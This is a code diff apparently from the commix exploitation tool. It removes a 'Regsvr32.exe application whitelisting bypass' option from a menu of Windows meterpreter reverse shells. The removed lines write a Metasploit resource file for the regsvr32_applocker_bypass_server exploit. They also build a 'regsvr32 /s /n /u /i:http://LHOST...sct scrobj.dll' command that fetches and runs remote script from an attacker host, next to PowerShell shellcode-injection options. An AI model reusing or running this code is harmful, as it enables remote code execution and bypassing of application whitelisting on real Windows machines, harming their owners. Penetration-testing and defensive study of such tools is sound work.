@@ -512,7 +512,6 @@ def other_reverse_shells(separator):
512512---[ """ + Style .BRIGHT + Fore .BLUE + """Powershell injection attacks""" + Style .RESET_ALL + """ ]---
513513Type '""" + Style .BRIGHT + """1""" + Style .RESET_ALL + """' to use shellcode injection with native x86 shellcode.
514514Type '""" + Style .BRIGHT + """2""" + Style .RESET_ALL + """' to use TrustedSec's Magic Unicorn.
515- Type '""" + Style .BRIGHT + """3""" + Style .RESET_ALL + """' to use Regsvr32.exe application whitelisting bypass.
516515\n commix(""" + Style .BRIGHT + Fore .RED + """windows_meterpreter_reverse_tcp""" + Style .RESET_ALL + """) > """ )
517516
518517 if any (option in windows_reverse_shell .lower () for option in settings .SHELL_OPTIONS ):
@@ -522,8 +521,6 @@ def other_reverse_shells(separator):
522521 output = "powershell_attack.rc"
523522 elif windows_reverse_shell == '2' :
524523 output = "powershell_attack.txt"
525- elif windows_reverse_shell == '3' :
526- output = "regsvr32_applocker_bypass_server.rc"
527524 else :
528525 err_msg = "The '" + windows_reverse_shell + "' option, is not valid."
529526 print (settings .print_error_msg (err_msg ))
@@ -603,24 +600,6 @@ def other_reverse_shells(separator):
603600 except :
604601 print (settings .SINGLE_WHITESPACE )
605602 break
606-
607- # Regsvr32.exe application whitelisting bypass
608- elif windows_reverse_shell == '3' :
609- with open (output , 'w+' ) as filewrite :
610- filewrite .write ("use exploit/windows/misc/regsvr32_applocker_bypass_server\n "
611- "set payload " + payload + "\n "
612- "set lhost " + str (settings .LHOST ) + "\n "
613- "set lport " + str (settings .LPORT ) + "\n "
614- "set srvport " + str (settings .SRVPORT ) + "\n "
615- "set uripath " + settings .URIPATH + "\n "
616- "exploit\n \n " )
617- if not settings .TARGET_OS == "win" :
618- windows_only_attack_vector ()
619- continue
620- else :
621- other_shell = "regsvr32 /s /n /u /i:http://" + str (settings .LHOST ) + ":" + str (settings .SRVPORT ) + settings .URIPATH + ".sct scrobj.dll"
622- msf_launch_msg (output )
623- break
624603 break
625604
626605 # Web delivery script
0 commit comments